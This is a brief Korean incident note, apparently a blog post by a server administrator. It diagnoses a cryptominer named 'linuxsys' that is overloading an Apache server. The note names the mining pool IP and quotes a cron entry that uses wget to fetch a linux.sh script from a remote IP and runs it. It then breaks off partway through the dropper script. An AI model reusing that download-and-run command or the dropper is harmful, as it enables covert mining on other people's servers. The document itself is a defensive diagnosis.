1. 증상 top 명령서 "linuxsys" 라는 놈이 cpu 600~700 차지하고 아파치 서버가 거의 죽을 정도로 동작 2. 채굴기 top 으로 보면 linuxsys 라는 놈 프로세스 아무리 찾아도 안보인다. 프로세스로 사용중인 포트와 ip를 찾아보니 http://141.94.96.195/ 이게 나온다. 접속해보면~ Mining Pool Online 내 서버로 채굴을 하고 있군... 2. 시스템로그 추적결과 클론쪽에서 저런 동작이 보인다. 클론에서 동작중인 내용을 보면 wget http://103.214.112.10/linux.sh 으로 받아오고 curl 로 실행을 시키고 있다. #!/bin/sh p=$(ps aux | grep -E 'linuxsys|jailshell' | grep -v grep |..
